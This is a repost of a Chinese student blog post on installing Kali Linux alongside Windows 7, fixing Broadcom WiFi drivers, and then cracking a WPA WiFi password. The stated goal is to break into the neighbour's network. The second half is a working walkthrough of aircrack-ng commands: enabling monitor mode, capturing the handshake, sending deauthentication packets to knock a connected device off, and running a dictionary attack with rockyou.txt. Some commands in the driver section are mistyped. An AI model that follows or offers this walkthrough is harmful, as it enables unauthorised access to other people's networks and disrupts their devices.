专栏首页光城(guangcity)win7+ kali linux双系统 + 无线路由WiFi破解

win7+ kali linux双系统 + 无线路由WiFi破解

win7+ kali linux双系统 + 无线路由WiFi破解

0.导语1.实战2.无线路由WiFi破解3.作者的话

0.导语

本篇文章写于本科大二下学期,本篇文章目的是攻破隔壁老王wifi密码,实现wifi路由密码的破解,所采用的的系统为linux中的kali,实现为win7+kali双系统+wifi破解! 欢迎大家留言,相互交流!

1.实战

失败原因分析

前期:失败---原因:经过多方查文第一次安装Linux成功,但是引导失败,原因就是微软的Easybcd不怎么支持efi装的系统,支持legal的系统。于是经过二次实战。从中午1点半非连续装机半完美解决于下午2点50 win7+kali Linux双系统装成功,并进入了正确引导。

实战解决

后期实战:问题:1)kali linux裸装后无WiFi驱动,无法连接wif;2)kali linux 裸装后有线由于没有netkeeper客户端,故不能上网,故首先解决问题---上网问题.

上网问题完美解决方案:1)经过尝试后,发现有线可以在机房通过chinanet进行连接,故走WiFi+有线连接方式,未配置dns及子网掩码之类的,便可以直接上网;2)使用ChinaNet连上网后,查文,访问外国网站,Google技术论坛,预解决kali linux的无线网络连接问题-----首要安装无线驱动----经过命令后,得到本机的驱动为博通bcm43142

解决方案

1)编辑/etc/apt/sources.list 在文件最后加

deb http://http.debian.net/debian/ jessie main contrib non-free

2)-5)都是在终端----------------------- 2)更新源

apt-get update

3)安装内核头文件

apt-get install linux-headers-$(uname -r|sed 's,[^-]*-[^-]*-,,') broadcom-sta-dkms

4)博通无线网卡驱动

modprobe -r b44 b43 b43legacy ssb brcmsmac

5)STA driver

modprobe wl

成功!!!

但是路途并不是这么畅通:使用apt-get命令过程中报错解决如下; 解决方案: 1)系统更新-----在sources.list中添加源 命令如下:

leafpad /etc/apt/sources.list

然后复制粘贴下面的源

#阿里云kali源  
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib  
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib  
deb http://mirrors.aliyun.com/kali-security kali-rolling/updates main contrib non-free  
deb-src http://mirrors.aliyun.com/kali-security kali-rolling/updates main contrib non-free  

#中科大kali源  
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib  
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib  
deb http://mirrors.ustc.edu.cn/kali-security kali-current/updates main contrib non-free  
deb-src http://mirrors.ustc.edu.cn/kali-security kali-current/updates main contrib non-free `

然后更新并安装

apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y 

2)安装内核头

直接使用上面源来升级内核

如下命令查看版本:

~# uname -r

这时候使用命令

apt-get install linux-headers-$(uname -r)

这样就可以了,但是我实践的时候碰到下面问题

命令: 
apt-get install linux-headers-$(uname -r) 
出现如下错误: 
E: Unable to locate package linux-headers-4.3.0-kali1-amd64 
E: Couldn't find any package by glob 'linux-headers-4.3.0-kali1-amd64 
E: Couldn't find any package by regex 'linux-headers-4.3.0-kali1-amd64

翻遍Google,得到解决方案,如下:

1.下载inux-kbuild,链接:(http://http.kali.org/kali/pool/main/l/linux-tools/)具体版本参见自己的主机; 
2.编译linux-kbuild; 
dkpg -i linux-kbuild-4.3_4.3.1-2kali1_amd64.deb

3.下载linux-header-common和主机版本对应的linux-header。链接(http://http.kali.org/kali/pool/main/l/linux/),具体版本参见自己的主机 
4.首先编译linux-header-common 
dkpg -i linux-headers-4.3.0-kali1-common_4.3.3-5kali4_amd64.deb 
5.最后编译linux-header 
dkpg -i linux-headers-4.3.0-kali1-amd64_4.3.3-5kali4_amd64.deb

于是乎,经过百般折腾后,WiFi启用成功!

网络之旅踏上新征程!

2.无线路由WiFi破解

1)首先断开连接的wifi 在终端中执行:

# airmon-ng

上面命令列出了支持监控模式的无线网卡。如果没有任何输出,表示无线网卡不支持监控模式。你可以看到我的wlan0支持监控模式。

2)开启无线网卡的监控模式

# airmon-ng start prism0

执行成功之后网卡接口变为prism0;可以使用ifconfig命令查看。

3)查看wifi网络

# airodump-ng prism0

上面列出了周围的wifi和它们的详细信息,包括信号强度、加密类型、频道等。要记住要破解wifi的频道号和BSSID。 按Ctrl-C结束。

4)抓取握手包 使用网卡的监听模式抓取周围的无线网络数据包。其中,对我们最重要的数据包是:包含密码的包-也叫握手包。当有新用户或断开用户自动连接wifi时,会发送握手包。 开始抓包:

# airodump-ng -c 6 --bssid C8:3A:35:30:3E:C8 -w ~/ prism0

参数解释: -c指定频道号 –bssid指定路由器bssid -w指定抓取的数据包保存位置

5)强制连接到wifi的设备重新连接路由器 现在我们只要等用户连接/重连接wifi了,运气不好也许要很长时间。 但是我们是不会等的,这不是耐心黑客该干的事。有一个叫aireplay-ng的工具,它可以强制用户断开wifi连接;原理是,给连接到wifi的一个设备发送一个deauth(反认证)包,让那个设备断开wifi,随后它自然会再次连接wifi。 aireplay-ng的生效前提是,wifi网络中至少有一个连接的设备。从上图(4)可以看到哪些设备连接到了wifi,STATION就是连接设备的MAC地址,记住一个。 打开新终端执行:

# aireplay-ng -0 2 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C prism0

参数解释: -0指定发送反认证包的个数 -a指定无线路由器BSSID -c指定强制断开的设备

如果成功:

按Ctrl-C结束抓包。 我们已经得到了想要的握手包了,可以结束无线网卡的监控模式了:

# airmon-ng stop prism0

6) 开始破解密码

# aircrack-ng -a2 -b C8:3A:35:30:3E:C8 -w /usr/share/wordlists/rockyou.txt ~/*.cap

参数解释: -a2代表WPA的握手包 -b指定要破解的wifi BSSID。 -w指定字典文件 最后是抓取的包

本文分享自微信公众号 - 光城(guangcity),作者:lightcity

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2018-12-19

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • ​精益求精单链表归并排序与快速排序

    本节主要阐述自顶向下与自底向上的归并排序,以及改变连接状态与改变节点值的可快速排序。下面来仔细阐述。

    公众号guangcity
  • Scrapy框架之批量下载360妹纸图

    0.导语1.项目初始化2.定义存储结构3.Spider核心代码4.pipeline下载及存储5.json知识

    公众号guangcity
  • 精益求精解LeetCode(82与83)

    好久没有刷题与更文了,今天来一场LeetCode上面简单与中等题目多种方法刷题。

    公众号guangcity
  • Flutter Json渐进式解析(下)

    前面几种Json数据格式最外层都是JsonObject,而下面这种,最外层就是一个JsonArray,数据如下所示。

    用户1907613
  • bootstrap fileinput 使用记录

    多出个上传按钮,图片也会多几个按钮,我选择了删除和放大图片的按钮,还可以显示图片单独上传按钮,这里我把它去掉了,统一在下方点击上传时,全部上传。==这里重点说下...

    老梁
  • pycharm远程linux开发和调试代码

    pycharm是一个非常强大的python开发工具,现在很多代码最终在线上跑的环境都是linux,而开发环境可能还是windows下开发,这就需要经常在linu...

    coders
  • 腾讯云语音识别.net-sdk使用笔记0818

    github的地址:https://github.com/TencentCloud/tencentcloud-sdk-dotnet/tree/master/Te...

    算法发
  • 一个Java实现的有道云笔记中包含的图片文件的批量下载工具

    Jerry Wang
  • 台式机使用Linux系统,是一种什么体验?

    从事嵌入式软件开发多年,主要开发环境用的就是linux,最疯狂的一段时间直接把系统装成linux系统,然后在linux下面虚拟一个windows操作系统,主要有...

    程序员互动联盟
  • 聊聊CarreraProducer的sendDelay

    DDMQ/carrera-sdk/producer/java/carrera-producer-sdk/src/main/java/com/xiaojukeji...

    codecraft

扫码关注云+社区

领取腾讯云代金券